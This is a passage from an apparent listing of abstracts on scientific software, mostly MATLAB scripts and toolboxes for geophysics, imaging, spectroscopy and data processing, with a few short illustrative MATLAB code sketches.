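The conversion itself is a small exercise once the grid-point values can be parsed; the sketch below illustrates the idea with MATLAB's built-in JSON reader and hand-written KML placemarks. The field names (lon, lat, dvp) and file names are assumptions, not the FDSN schema, and the real generator is a web application rather than a local script.

% Read grid-point values from an assumed JSON file and write simple KML placemarks.
s = jsondecode(fileread('tomography.json'));    % assumed fields: s.lon, s.lat, s.dvp [%]
fid = fopen('tomography.kml', 'w');
fprintf(fid, '<?xml version="1.0" encoding="UTF-8"?>\n');
fprintf(fid, '<kml xmlns="http://www.opengis.net/kml/2.2">\n<Document>\n');
for i = 1:numel(s.lon)
    fprintf(fid, '<Placemark><name>%.1f%%</name><Point><coordinates>%f,%f,0</coordinates></Point></Placemark>\n', ...
            s.dvp(i), s.lon(i), s.lat(i));
end
fprintf(fid, '</Document>\n</kml>\n');
fclose(fid);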
University of Massachusetts Marine Renewable Energy Center Waverider Bouy Data
Lohrenz, Steven
2015-10-07
The compressed (.zip) file contains Datawell MK-III Directional Waverider binary and unpacked data files as well as a description of the data and manuals for the instrumentation. The data files are contained in the two directories within the zip file, ''Apr_July_2012'' and ''Jun_Sept_2013''. Time series and summary data were recorded in the buoy to binary files with extensions '.RDT' and '.SDT', respectively. These are located in the subdirectories 'Data_Raw' in each of the top-level deployment directories. '.RDT' files contain 3 days of time series (at 1.28 Hz) in 30 minute "bursts". Each '.SDT' file contains summary statistics for the month indicated computed at half-hour intervals for each burst. Each deployment directory also contains a description (in 'File.list') of the Datawell binary data files, and a figure ('Hs_vs_yearday') showing the significant wave height associated with each .RDT file (decoded from the filename). The corresponding unpacked Matlab .mat files are contained in the subdirectories 'Data_Mat'. These files have the extension '.mat' but use the root filename of the source .RDT and .SDT files.
Extraction of CT dose information from DICOM metadata: automated Matlab-based approach.
Dave, Jaydev K; Gingold, Eric L
2013-01-01
The purpose of this study was to extract exposure parameters and dose-relevant indexes of CT examinations from information embedded in DICOM metadata. DICOM dose report files were identified and retrieved from a PACS. An automated software program was used to extract exposure-relevant information from the structured elements in the DICOM metadata of these files. Extracting information from DICOM metadata eliminated potential errors inherent in techniques based on optical character recognition, yielding 100% accuracy.
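For orientation only, the fragment below shows how exposure-related attributes can be pulled from CT DICOM headers with MATLAB's Image Processing Toolbox. It is a much simpler illustration than the authors' program, which parses the structured dose report (the nested ContentSequence items); the directory name is an assumption, and the fields are read only if present in a given header.

% Scan an assumed directory of CT DICOM files and report a few exposure fields.
files = dir(fullfile('ct_study', '*.dcm'));
for i = 1:numel(files)
    info = dicominfo(fullfile(files(i).folder, files(i).name));
    kvp = NaN;  mas = NaN;  ctdi = NaN;
    if isfield(info, 'KVP'),      kvp  = info.KVP;      end
    if isfield(info, 'Exposure'), mas  = info.Exposure; end
    if isfield(info, 'CTDIvol'),  ctdi = info.CTDIvol;  end
    fprintf('%s: kVp=%g, mAs=%g, CTDIvol=%g\n', files(i).name, kvp, mas, ctdi);
end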
Ravi, Keerthi Sravan; Potdar, Sneha; Poojar, Pavan; Reddy, Ashok Kumar; Kroboth, Stefan; Nielsen, Jon-Fredrik; Zaitsev, Maxim; Venkatesan, Ramesh; Geethanath, Sairam
2018-03-11
To provide a single open-source platform for comprehensive MR algorithm development inclusive of simulations, pulse sequence design and deployment, reconstruction, and image analysis. We integrated the "Pulseq" platform for vendor-independent pulse programming with Graphical Programming Interface (GPI), a scientific development environment based on Python. Our integrated platform, Pulseq-GPI, permits sequences to be defined visually and exported to the Pulseq file format for execution on an MR scanner. For comparison, Pulseq files using either MATLAB only ("MATLAB-Pulseq") or Python only ("Python-Pulseq") were generated. We demonstrated three fundamental sequences on a 1.5 T scanner. Execution times of the three variants of implementation were compared on two operating systems. In vitro phantom images indicate equivalence with the vendor-supplied implementations and MATLAB-Pulseq. The examples demonstrated in this work illustrate the unifying capability of Pulseq-GPI. The execution times of all three implementations were fast (a few seconds). The software is capable of user-interface based development and/or command line programming. The tool demonstrated here, Pulseq-GPI, integrates the open-source simulation, reconstruction and analysis capabilities of GPI Lab with the pulse sequence design and deployment features of Pulseq. Current and future work includes providing an ISMRMRD interface and incorporating Specific Absorption Rate and Peripheral Nerve Stimulation computations. Copyright © 2018 Elsevier Inc. All rights reserved.
Using ABAQUS Scripting Interface for Materials Evaluation and Life Prediction
NASA Technical Reports Server (NTRS)
Powers, Lynn M.; Arnold, Steven M.; Baranski, Andrzej
2006-01-01
An ABAQUS script has been written to aid in the evaluation of the mechanical behavior of viscoplastic materials. The purposes of the script are to: handle complex load histories; control load/displacement with alternate stopping criteria; predict failure and life; and verify constitutive models. Material models from the ABAQUS library may be used or the UMAT routine may specify mechanical behavior. User subroutines implemented include: UMAT for the constitutive model; UEXTERNALDB for file manipulation; DISP for boundary conditions; and URDFIL for results processing. Examples presented include load, strain and displacement control tests on a single element model. The tests are creep with a life limiting strain criterion, strain control with a stress limiting cycle and a complex interrupted cyclic relaxation test. The techniques implemented in this paper enable complex load conditions to be solved efficiently with ABAQUS.
This is an R statistics package script that allows the reproduction of Figure 5. The script includes the links to large NetCDF files that the figures access for O3, CO, wind speed, radiation and PBL height. It pulls the time series for each variable at a number of cities (specified by latitude-longitude). This dataset is associated with the following publication: Gilliam, R., C. Hogrefe, J. Godowitch, S. Napelenok, R. Mathur, and S.T. Rao. Impact of inherent meteorology uncertainty on air quality model predictions. JOURNAL OF GEOPHYSICAL RESEARCH-ATMOSPHERES. American Geophysical Union, Washington, DC, USA, 120(23): 12,259–12,280, (2015).
A MATLAB based 3D modeling and inversion code for MT data
NASA Astrophysics Data System (ADS)
Singh, Arun; Dehiya, Rahul; Gupta, Pravin K.; Israil, M.
2017-07-01
The development of a MATLAB based computer code, AP3DMT, for modeling and inversion of 3D Magnetotelluric (MT) data is presented. The code comprises two independent components: grid generator code and modeling/inversion code. The grid generator code performs model discretization and acts as an interface by generating various I/O files. The inversion code performs core computations in modular form - forward modeling, data functionals, sensitivity computations and regularization. These modules can be readily extended to other similar inverse problems like Controlled-Source EM (CSEM). The modular structure of the code provides a framework useful for implementation of new applications and inversion algorithms. The use of MATLAB and its libraries makes it more compact and user friendly. The code has been validated on several published models. To demonstrate its versatility and capabilities the results of inversion for two complex models are presented.
A Series of MATLAB Learning Modules to Enhance Numerical Competency in Applied Marine Sciences
NASA Astrophysics Data System (ADS)
Fischer, A. M.; Lucieer, V.; Burke, C.
2016-12-01
Enhanced numerical competency to navigate massive data landscapes is a critical skill students need to effectively explore, analyse and visualize complex patterns in high-dimensional data and to address the complexity of many of the world's problems. This is especially the case for interdisciplinary, undergraduate applied marine science programs, where students are required to demonstrate competency in methods and ideas across multiple disciplines. In response to this challenge, we have developed a series of repository-based data exploration, analysis and visualization modules in MATLAB for integration across various attending and online classes within the University of Tasmania. The primary focus of these modules is to teach students to collect, aggregate and interpret data from large on-line marine scientific data repositories in order to, 1) gain technical skills in discovering, accessing, managing and visualising large, numerous data sources, 2) interpret, analyse and design approaches to visualise these data, and 3) address, through numerical approaches, complex, real-world problems that the traditional scientific methods cannot address. All modules, implemented through a MATLAB live script, include a short recorded lecture to introduce the topic, a handout that gives an overview of the activities, an instructor's manual with a detailed methodology and discussion points, a student assessment (quiz and level-specific challenge task), and a survey. The marine science themes addressed through these modules include biodiversity, habitat mapping, algal blooms and sea surface temperature change, and utilize a series of marine science and oceanographic data portals. Through these modules, students with minimal experience in MATLAB or numerical methods are introduced to array indexing, concatenation, sorting, and reshaping, principal component analysis, spectral analysis and unsupervised classification within the context of oceanographic processes, marine geology and marine community ecology.
Spec2Harv: Converting Spectrum output to HARVEST input
Eric J. Gustafson; Luke V. Rasmussen; Larry A. Leefers
2003-01-01
Spec2Harv was developed to automate the conversion of harvest schedules generated by the Spectrum model into script files that can be used by the HARVEST simulation model to simulate the implementation of the Spectrum schedules in a spatially explicit way.
Laamrani, Ahmed; Pardo Lara, Renato; Berg, Aaron A; Branson, Dave; Joosse, Pamela
2018-02-27
Quantifying the amount of crop residue left in the field after harvest is a key issue for sustainability. Conventional assessment approaches (e.g., line-transect) are labor intensive, time-consuming and costly. Many proximal remote sensing devices and systems have been developed for agricultural applications such as cover crop and residue mapping. For instance, current mobile devices (smartphones & tablets) are usually equipped with digital cameras and global positioning systems and use applications (apps) for in-field data collection and analysis. In this study, we assess the feasibility and strength of a mobile device app developed to estimate crop residue cover. The performance of this novel technique (from here on referred to as "app" method) was compared against two point counting approaches: an established digital photograph-grid method and a new automated residue counting script developed in MATLAB at the University of Guelph. Both photograph-grid and script methods were used to count residue under 100 grid points. Residue percent cover was estimated using the app, script and photograph-grid methods on 54 vertical digital photographs (images of the ground taken from above at a height of 1.5 m) collected from eighteen fields (9 corn and 9 soybean, 3 samples each) located in southern Ontario. Results showed that residue estimates from the app method were in good agreement with those obtained from both photograph-grid and script methods (R² = 0.86 and 0.84, respectively). This study has found that the app underestimates the residue coverage by -6.3% and -10.8% when compared to the photograph-grid and script methods, respectively. With regards to residue type, soybean has a slightly lower bias than corn (i.e., -5.3% vs. -7.4%). For photos with residue <30%, the app derived residue measurements are within ±5% difference (bias) of both photograph-grid- and script-derived residue measurements. These methods could therefore be used to track the recommended minimum soil residue cover of 30%, implemented to reduce farmland topsoil and nutrient losses that impact water quality. Overall, the app method was found to be a good alternative to the point counting methods, which are more time-consuming.
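The point-count idea (residue presence under 100 grid points per photograph) is easy to prototype; the sketch below is a generic illustration in MATLAB rather than the Guelph script or the mobile app, and the file name and brightness threshold are assumptions.

% Estimate percent residue cover from a vertical photograph using a 10 x 10 point grid.
rgb  = imread('field_photo.jpg');                 % assumed 1.5 m vertical photo
gray = rgb2gray(rgb);
residue = imbinarize(gray);                       % assumes residue is brighter than soil
[r, c] = size(residue);
rows = round(linspace(1, r, 10));
cols = round(linspace(1, c, 10));
[R, C] = ndgrid(rows, cols);                      % the 100 grid points
hits = residue(sub2ind(size(residue), R(:), C(:)));
percentCover = 100*sum(hits)/numel(hits)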
Bacelli, Giorgio
2016-09-28
Modeling and performance data in a Matlab data file (.mat) containing 3 structures (WEC model, simRes_sr and simRes_fix), and a PDF document describing the model, the simulations, and the analysis that was carried out.
Characterizing and Quantifying Time Dependent Night Sky Brightness In and Around Tucson, Arizona
NASA Astrophysics Data System (ADS)
Nydegger, Rachel
2014-01-01
As part of a Research Experience for Undergraduates (REU) program with the National Optical Astronomy Observatory (NOAO), I (with mentor Dr. Constance Walker of NOAO) characterized light pollution in and near Tucson, Arizona using eight Sky Quality Meters (SQMs). In order to analyze the data in a consistent way for comparison, we created a standard procedure for reduction and analysis using Python and MATLAB. The Python scripts remove faulty data and isolate the anthropogenic light pollution by excluding contributions made by the sun, moon, and the Milky Way. We then use MATLAB code to illustrate how the light pollution changes in relation to time, distance from the city, and airglow. Data are then analyzed with a recently developed sky brightness model created by Dan Duriscoe of the National Park Service. To quantify the measurements taken by the SQMs, we tested the wavelength sensitivity of the devices used for the data collection. The findings from the laboratory testing have prompted innovations for the SQMs and have given a sense of how data gathered by these devices should be treated.
NASA Technical Reports Server (NTRS)
Deshpande, Manohar D.; Dudley, Kenneth
2003-01-01
A simple method is presented to estimate the complex dielectric constants of individual layers of a multilayer composite material. Using the MatLab Optimization Tools, simple MatLab scripts are written to search for the electric properties of individual layers so as to match the measured and calculated S-parameters. Single-layer composite materials formed from materials such as Bakelite, Nomex Felt, Fiber Glass, Woven Composite B and G, Nano Material #0, Cork, and Garlock, of different thicknesses, are tested using the present approach. Assuming the thicknesses of the samples to be unknown, the present approach is shown to work well in estimating the dielectric constants and the thicknesses. A number of two-layer composite materials formed by various combinations of the above individual materials are also tested using the present approach. However, the present approach could not provide estimates close to the true values when the thicknesses of the individual layers were assumed to be unknown. This is attributed to the difficulty of modelling the airgaps present between the layers during the S-parameter measurements. A few examples of three-layer composites are also presented.
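The optimization step can be illustrated with a small, self-contained fit; the sketch below uses a free-space, normal-incidence slab model (standard NRW-style forward equations) rather than the authors' measurement setup, and all numerical values, including the synthetic "measurement", are assumptions.

% Fit a complex permittivity to slab transmission data with bounded least squares.
c0 = 299792458;  d = 3e-3;  f = (8:0.05:12)'*1e9;          % thickness [m], X-band sweep [Hz]
fwd = @(epsr) slabS21(epsr, d, f, c0);
Smeas = fwd(4.3 - 0.12i) + 0.005*(randn(size(f)) + 1i*randn(size(f)));  % synthetic data
resid = @(p) [real(fwd(p(1) - 1i*p(2)) - Smeas); imag(fwd(p(1) - 1i*p(2)) - Smeas)];
pFit  = lsqnonlin(resid, [3 0.05], [1 0], [20 5]);         % recovers roughly [4.3 0.12]
fprintf('estimated epsr = %.2f - %.3fi\n', pFit(1), pFit(2));

function S21 = slabS21(epsr, d, f, c0)
    k0 = 2*pi*f/c0;                       % free-space wavenumber
    n  = sqrt(epsr);                      % complex refractive index (nonmagnetic slab)
    G  = (1 - n)./(1 + n);                % interface reflection coefficient
    P  = exp(-1i*k0.*n*d);                % propagation factor through the slab
    S21 = P.*(1 - G.^2)./(1 - (G.^2).*(P.^2));
end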
NASA Technical Reports Server (NTRS)
Steck, Daniel
2009-01-01
This report documents the generation of a preliminary database of outbound Earth-to-Moon transfers consisting of four cases calculated twice a day over a 19-year period. The database was desired as the first step in enabling NASA to rapidly generate Earth-to-Moon trajectories for the Constellation Program using the Mission Assessment Post Processor. The completed database was created by running a flight trajectory and optimization program, called Copernicus, in batch mode with the use of newly created Matlab functions. The database is accurate and has high data resolution. The techniques and scripts developed to generate the trajectory information will also be used directly in generating a comprehensive database.
Fully automated processing of fMRI data in SPM: from MRI scanner to PACS.
Maldjian, Joseph A; Baer, Aaron H; Kraft, Robert A; Laurienti, Paul J; Burdette, Jonathan H
2009-01-01
Here we describe the Wake Forest University Pipeline, a fully automated method for the processing of fMRI data using SPM. The method includes fully automated data transfer and archiving from the point of acquisition, real-time batch script generation, distributed grid processing, interface to SPM in MATLAB, error recovery and data provenance, DICOM conversion and PACS insertion. It has been used for automated processing of fMRI experiments, as well as for the clinical implementation of fMRI and spin-tag perfusion imaging. The pipeline requires no manual intervention, and can be extended to any studies requiring offline processing.
SBEToolbox: A Matlab Toolbox for Biological Network Analysis
Konganti, Kranti; Wang, Gang; Yang, Ence; Cai, James J.
2013-01-01
We present SBEToolbox (Systems Biology and Evolution Toolbox), an open-source Matlab toolbox for biological network analysis. It takes a network file as input, calculates a variety of centralities and topological metrics, clusters nodes into modules, and displays the network using different graph layout algorithms. Straightforward implementation and the inclusion of high-level functions allow the functionality to be easily extended or tailored through developing custom plugins. SBEGUI, a menu-driven graphical user interface (GUI) of SBEToolbox, enables easy access to various network and graph algorithms for programmers and non-programmers alike. All source code and sample data are freely available at https://github.com/biocoder/SBEToolbox/releases. PMID:24027418
SBEToolbox: A Matlab Toolbox for Biological Network Analysis.
Konganti, Kranti; Wang, Gang; Yang, Ence; Cai, James J
2013-01-01
We present SBEToolbox (Systems Biology and Evolution Toolbox), an open-source Matlab toolbox for biological network analysis. It takes a network file as input, calculates a variety of centralities and topological metrics, clusters nodes into modules, and displays the network using different graph layout algorithms. Straightforward implementation and the inclusion of high-level functions allow the functionality to be easily extended or tailored through developing custom plugins. SBEGUI, a menu-driven graphical user interface (GUI) of SBEToolbox, enables easy access to various network and graph algorithms for programmers and non-programmers alike. All source code and sample data are freely available at https://github.com/biocoder/SBEToolbox/releases.
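For readers who just want to see what such centrality calculations look like in practice, the fragment below uses MATLAB's built-in graph functions on the bundled bucky adjacency matrix; it is for orientation only and is not the SBEToolbox API.

% Node centralities and a simple layout with built-in MATLAB graph tools.
G   = graph(bucky);                               % 60-node example network
deg = centrality(G, 'degree');
btw = centrality(G, 'betweenness');
plot(G, 'MarkerSize', 2 + 8*btw/max(btw));        % size nodes by betweenness centrality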
NASA Astrophysics Data System (ADS)
Bhattacharjee, T.; Kumar, P.; Fillipe, L.
2018-02-01
Vibrational spectroscopy, especially FTIR and Raman, has shown enormous potential in disease diagnosis, especially in cancers. Its potential for detecting varied pathological conditions is regularly reported. However, to prove its applicability in clinics, large multi-center, multi-national studies need to be undertaken, and these will result in an enormous amount of data. A parallel effort to develop analytical methods, including user-friendly software that can quickly pre-process data and subject them to the required multivariate analysis, is warranted in order to obtain results in real time. This study reports a MATLAB based script that can automatically import data, preprocess spectra (interpolation, derivatives, normalization), and then carry out Principal Component Analysis (PCA) followed by Linear Discriminant Analysis (LDA) of the first 10 PCs, all with a single click. The software has been verified on data obtained from cell lines, animal models, and in vivo patient datasets, and gives results comparable to the Minitab 16 software. The software can be used to import a variety of file extensions (.asc, .txt, .xls, and many others). Options to ignore noisy data, plot all possible graphs with PCA factors 1 to 5, and save loading factors, confusion matrices and other parameters are also present. The software can provide results for a dataset of 300 spectra within 0.01 s. We believe that the software will be vital not only in clinical trials using vibrational spectroscopic data, but also in obtaining rapid results when these tools are translated into clinics.
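The PCA-LDA chain described above can be sketched in a few lines with MATLAB's Statistics Toolbox; this is not the authors' script, and the synthetic matrix below merely stands in for a set of vector-normalized spectra.

% PCA followed by LDA on the first 10 principal components.
rng(0);
X = [randn(30, 200); randn(30, 200) + 0.4];     % 60 synthetic "spectra", two classes
y = [ones(30, 1); 2*ones(30, 1)];               % class labels
Xn = X ./ vecnorm(X, 2, 2);                     % vector-normalise each spectrum
[~, score] = pca(Xn);                           % principal component scores
mdl = fitcdiscr(score(:, 1:10), y);             % linear discriminant analysis on 10 PCs
cm  = confusionmat(y, resubPredict(mdl))        % resubstitution confusion matrix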
SimITK: rapid ITK prototyping using the Simulink visual programming environment
NASA Astrophysics Data System (ADS)
Dickinson, A. W. L.; Mousavi, P.; Gobbi, D. G.; Abolmaesumi, P.
2011-03-01
The Insight Segmentation and Registration Toolkit (ITK) is a long-established software package used for image analysis, visualization, and image-guided surgery applications. This package is a collection of C++ libraries that can pose usability problems for users without C++ programming experience. To bridge the gap between the programming complexities and the required learning curve of ITK, we present a higher-level visual programming environment that represents ITK methods and classes by wrapping them into "blocks" within MATLAB's visual programming environment, Simulink. These blocks can be connected to form workflows: visual schematics that closely represent the structure of a C++ program. Due to the heavily C++-templated nature of ITK, direct interaction between Simulink and ITK requires an intermediary to convert their respective datatypes and allow intercommunication. We have developed a "Virtual Block" that serves as an intermediate wrapper around the ITK class and is responsible for resolving the templated datatypes used by ITK to native types used by Simulink. Presently, the wrapping procedure for SimITK is semi-automatic in that it requires XML descriptions of the ITK classes as a starting point, as these data are used to create all other necessary integration files. The generation of all source code and object code from the XML is done automatically by a CMake build script that yields Simulink blocks as the final result. An example 3D segmentation workflow using cranial-CT data as well as a 3D MR-to-CT registration workflow are presented as a proof-of-concept.
Counter-Flow Cooling Tower Test Cell
NASA Astrophysics Data System (ADS)
Dvořák, Lukáš; Nožička, Jiří
2014-03-01
The article presents the design of a functional experimental model of a cross-flow mechanical draft cooling tower together with the results and outcomes of measurements. The device is primarily used for measuring the performance characteristics of cooling fills, but with a simple rebuild it can be used for measuring other thermodynamic processes that take part in so-called wet cooling. The main advantages of this particular test cell lie in its accuracy, size, and the possibility of changing the water distribution level. This feature is very useful for measurements of fills of different heights without the influence of the spray and rain zones. The functionality of the test cell has been verified experimentally during assembly, and data from measurements of common film cooling fills have been compared against results taken from another experimental line. For the purpose of evaluating the data gathered, computational scripts were created in the MATLAB numerical computing environment. The first script performs an exact calculation of the thermal balance of the model, and the second determines the Merkel number via the Chebyshev method.
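For readers unfamiliar with the second script's task, the sketch below evaluates the Merkel number with the common four-point Chebyshev quadrature. It is a generic textbook form rather than the authors' code; the water temperatures, inlet air enthalpy, water-to-air ratio, and the small saturated-air enthalpy table are all assumed values.

% Merkel number (KaV/L) by the four-point Chebyshev method.
cpw   = 4.186;                          % specific heat of water [kJ/(kg K)]
Twin  = 38;  Twout = 30;                % hot and cold water temperatures [degC] (assumed)
haIn  = 65;  LG = 1.2;                  % inlet air enthalpy [kJ/kg] and L/G ratio (assumed)
Tsat  = [25 30 35 40 45];               % approximate saturated-air enthalpies at 101.3 kPa
hsatT = [76.5 100.0 129.4 166.7 214.1]; % [kJ/kg dry air]
hsat  = @(T) interp1(Tsat, hsatT, T, 'pchip');
p  = [0.1 0.4 0.6 0.9];                 % Chebyshev evaluation points
Tw = Twout + p*(Twin - Twout);          % water temperatures at the four points
ha = haIn + p*LG*cpw*(Twin - Twout);    % air enthalpy along the operating line
dh = hsat(Tw) - ha;                     % local enthalpy driving force
Me = cpw*(Twin - Twout)/4 * sum(1./dh)  % Merkel number, roughly 0.86 for these inputs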
FracPaQ: A MATLAB™ toolbox for the quantification of fracture patterns
NASA Astrophysics Data System (ADS)
Healy, David; Rizzo, Roberto E.; Cornwell, David G.; Farrell, Natalie J. C.; Watkins, Hannah; Timms, Nick E.; Gomez-Rivas, Enrique; Smith, Michael
2017-02-01
The patterns of fractures in deformed rocks are rarely uniform or random. Fracture orientations, sizes, and spatial distributions often exhibit some kind of order. In detail, relationships may exist among the different fracture attributes, e.g. small fractures dominated by one orientation, larger fractures by another. These relationships are important because the mechanical (e.g. strength, anisotropy) and transport (e.g. fluids, heat) properties of rock depend on these fracture attributes and patterns. This paper describes FracPaQ, a new open source, cross-platform toolbox to quantify fracture patterns, including distributions in fracture attributes and their spatial variation. Software has been developed to quantify fracture patterns from 2-D digital images, such as thin section micrographs, geological maps, outcrop or aerial photographs or satellite images. The toolbox comprises a suite of MATLAB™ scripts based on previously published quantitative methods for the analysis of fracture attributes: orientations, lengths, intensity, density and connectivity. An estimate of permeability in 2-D is made using a parallel plate model. The software provides an objective and consistent methodology for quantifying fracture patterns and their variations in 2-D across a wide range of length scales, rock types and tectonic settings. The implemented methods are inherently scale independent, and a key task where applicable is analysing and integrating quantitative fracture pattern data from micro- to macro-scales. The toolbox was developed in MATLAB™ and the source code is publicly available on GitHub™ and the Mathworks™ FileExchange. The code runs on any computer with MATLAB installed, including PCs with Microsoft Windows, Apple Macs with Mac OS X, and machines running different flavours of Linux. The application, source code and sample input files are available in open repositories in the hope that other developers and researchers will optimise and extend the functionality for the benefit of the wider community.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Tran, Anh Phuong; Dafflon, Baptiste; Hubbard, Susan
2016-04-01
TOUGH2 and iTOUGH2 are powerful models that simulate heat and fluid flows in porous and fractured media, and perform parameter estimation, sensitivity analysis and uncertainty propagation analysis. However, setting up the input files is not only tedious but error prone, and processing the output files is time consuming. Here, we present an open-source Matlab-based tool (iMatTOUGH) that supports the generation of all necessary inputs for both TOUGH2 and iTOUGH2 and visualizes their outputs. The tool links the inputs of TOUGH2 and iTOUGH2, making sure the two input files are consistent. It supports the generation of a rectangular computational mesh, i.e., it automatically generates the elements and connections as well as their properties as required by TOUGH2. The tool also allows the specification of initial and time-dependent boundary conditions for better subsurface heat and water flow simulations. The effectiveness of the tool is illustrated by an example that uses TOUGH2 and iTOUGH2 to estimate soil hydrological and thermal properties from soil temperature data and simulate the heat and water flows at the Rifle site in Colorado.
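As a rough illustration of the mesh-generation step described above (not iMatTOUGH code), the following MATLAB sketch builds a small rectangular grid of element centres, volumes and vertical connection properties of the kind TOUGH2 expects; all grid dimensions are placeholders.

% Illustrative sketch: simple 2-D rectangular mesh as TOUGH2-style elements
% (centres, volumes) and vertical connections (interface areas, nodal distances).
dx = 1.0; dz = 0.25; nx = 10; nz = 40; thick = 1.0;   % cell sizes [m] and counts (placeholders)
xc = dx*((1:nx) - 0.5);                                % element centre x
zc = -dz*((1:nz) - 0.5);                               % element centre z (downward)
[X, Z] = meshgrid(xc, zc);                             % element centre coordinates
vol = dx*dz*thick*ones(nz, nx);                        % element volumes
connArea = dx*thick;                                   % interface area of a vertical connection
connD1   = dz/2;  connD2 = dz/2;                       % nodal distances on either side
nConn    = (nz-1)*nx;                                  % number of vertical connections
fprintf('%d elements, %d vertical connections\n', numel(vol), nConn);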
Bounded tracking for nonminimum phase nonlinear systems with fast zero dynamics
DOT National Transportation Integrated Search
1996-12-01
A PostScript file. In this paper, tracking control laws for nonminimum phase nonlinear systems with both fast and slow, possibly unstable, zero dynamics are derived. The fast zero dynamics arise from a perturbation of a nominal system. These fast zer...
SciServer Compute brings Analysis to Big Data in the Cloud
NASA Astrophysics Data System (ADS)
Raddick, Jordan; Medvedev, Dmitry; Lemson, Gerard; Souter, Barbara
2016-06-01
SciServer Compute uses Jupyter Notebooks running within server-side Docker containers attached to big data collections to bring advanced analysis to big data "in the cloud." SciServer Compute is a component in the SciServer Big-Data ecosystem under development at JHU, which will provide a stable, reproducible, sharable virtual research environment. SciServer builds on the popular CasJobs and SkyServer systems that made the Sloan Digital Sky Survey (SDSS) archive one of the most-used astronomical instruments. SciServer extends those systems with server-side computational capabilities and very large scratch storage space, and further extends their functions to a range of other scientific disciplines. Although big datasets like SDSS have revolutionized astronomy research, for further analysis, users are still restricted to downloading the selected data sets locally - but increasing data sizes make this local approach impractical. Instead, researchers need online tools that are co-located with data in a virtual research environment, enabling them to bring their analysis to the data. SciServer supports this using the popular Jupyter notebooks, which allow users to write their own Python and R scripts and execute them on the server with the data (extensions to Matlab and other languages are planned). We have written special-purpose libraries that enable querying the databases and other persistent datasets. Intermediate results can be stored in large scratch space (hundreds of TBs) and analyzed directly from within Python or R with state-of-the-art visualization and machine learning libraries. Users can store science-ready results in their permanent allocation on SciDrive, a Dropbox-like system for sharing and publishing files. Communication between the various components of the SciServer system is managed through SciServer's new Single Sign-on Portal. We have created a number of demos to illustrate the capabilities of SciServer Compute, including Python and R scripts accessing a range of datasets and showing the data flow between storage and compute components. Demos, documentation, and more information can be found at www.sciserver.org. SciServer is funded by the National Science Foundation Award ACI-1261715.
The GOLM-database standard- a framework for time-series data management based on free software
NASA Astrophysics Data System (ADS)
Eichler, M.; Francke, T.; Kneis, D.; Reusser, D.
2009-04-01
Monitoring and modelling projects usually involve time series data originating from different sources. File formats, temporal resolution and meta-data documentation rarely adhere to a common standard. As a result, much effort is spent on converting, harmonizing, merging, checking, resampling and reformatting these data. Moreover, in work groups or over the course of time, these tasks tend to be carried out redundantly and repeatedly, especially when new data become available. The resulting duplication of data in various formats ties up additional resources. We propose a database structure and complementary scripts for facilitating these tasks. The GOLM (General Observation and Location Management) framework allows for the import and storage of time series data of different types while assisting in meta-data documentation, plausibility checking and harmonization. The imported data can be visually inspected and their coverage among locations and variables may be visualized. Supplementary scripts provide options for exporting data for selected stations and variables and for resampling the data to the desired temporal resolution. These tools can, for example, be used for generating model input files or reports. Since GOLM fully supports network access, the system can be used efficiently by distributed working groups accessing the same data over the internet. GOLM's database structure and the complementary scripts can easily be customized to specific needs. All involved software, such as MySQL, R, PHP and OpenOffice, as well as the scripts for building and using the database, including documentation, are free for download. GOLM was developed out of the practical requirements of the OPAQUE project. It has been tested and further refined in the ERANET-CRUE and SESAM projects, all of which used GOLM to manage meteorological, hydrological and/or water quality data.
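The GOLM scripts themselves are written in R and PHP; purely as an illustration of the resampling step described above, the following MATLAB sketch aggregates an irregular time series to hourly means (times and values are synthetic placeholders).

% Illustrative resampling sketch: irregular samples aggregated to hourly means.
t  = cumsum(randi(1200, 200, 1));           % irregular observation times [s] (synthetic)
v  = 10 + randn(200, 1);                    % observed values (synthetic)
dt = 3600;                                  % target resolution: one hour [s]
bin = floor(t/dt) + 1;                      % hourly bin index for each sample
hourlyMean = accumarray(bin, v, [], @mean, NaN);   % one value per hour, NaN where no data
plot(hourlyMean, '.-'), xlabel('Hour'), ylabel('Mean value')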
Conversion of the Aeronautics Interactive Workstation
NASA Technical Reports Server (NTRS)
Riveras, Nykkita L.
2004-01-01
This summer I am working in the Educational Programs Office. My task is to convert the Aeronautics Interactive Workstation from a Macintosh (Mac) platform to a Personal Computer (PC) platform. The Aeronautics Interactive Workstation is a workstation in the Aerospace Educational Laboratory (AEL), which is one of the three components of the Science, Engineering, Mathematics, and Aerospace Academy (SEMAA). The AEL is a state-of-the-art, electronically enhanced, computerized classroom that puts cutting-edge technology at the fingertips of participating students. It provides a unique learning experience regarding aerospace technology that features activities equipped with aerospace hardware and software that model real-world challenges. The Aeronautics Interactive Workstation, in particular, offers a variety of activities pertaining to the history of aeronautics. When the Aeronautics Interactive Workstation was first implemented in the AEL it was designed with Macromedia Director 4 for a Mac. Today it is being converted to Macromedia Director MX 2004 for a PC. Macromedia Director is the proven multimedia tool for building rich content and applications for CDs, DVDs, kiosks, and the Internet. It handles the widest variety of media and offers powerful features for building rich content that delivers real results, integrating interactive audio, video, bitmaps, vectors, text, fonts, and more. Macromedia Director currently offers two programming/scripting languages: Lingo, which is Director's own programming/scripting language, and JavaScript. In the workstation, Lingo is used for the programming/scripting since it was the only language in use when the workstation was created. Since the workstation was created with an older version of Macromedia Director, it used significantly different programming/scripting protocols. In order to successfully accomplish my task, the final product required correction of Xtra and programming/scripting errors. I also had to convert the Mac platform file extensions into compatible file extensions for a PC.
Inertial Manifolds for Navier-Stokes Equations and Related Dynamical Systems
1991-05-31
Graphics IRIS (SGI). The RLE files for the animation are loaded to an Abekas and recorded to tape by Betacam. This computational work was done by using the...scripts and comments, are loaded to the Abekas-A60 digital image storage device, and then recorded to the Betacam BVW-75 analog tape recorder. Static...interfacing, huge data files are output to the Data Vault in parallel with little cost. In addition to the SGIs, Abekas, Betacam and Solitaire, the
CrossTalk. The Journal of Defense Software Engineering. Volume 16, Number 11, November 2003
2003-11-01
memory area, and stack pointer. These systems are classified as preemptive or nonpreemptive depending on whether they can preempt an existing task or not...of charge. The Software Technology Support Center was established at Ogden Air Logistics Center (AFMC) by Headquarters U.S. Air Force to help Air...device. A script file could be a list of commands for a command interpreter such as a batch file [15]. A communications port consists of a queue to hold
A Study and Taxonomy of Vulnerabilities in Web Based Animation and Interactivity Software
2010-12-01
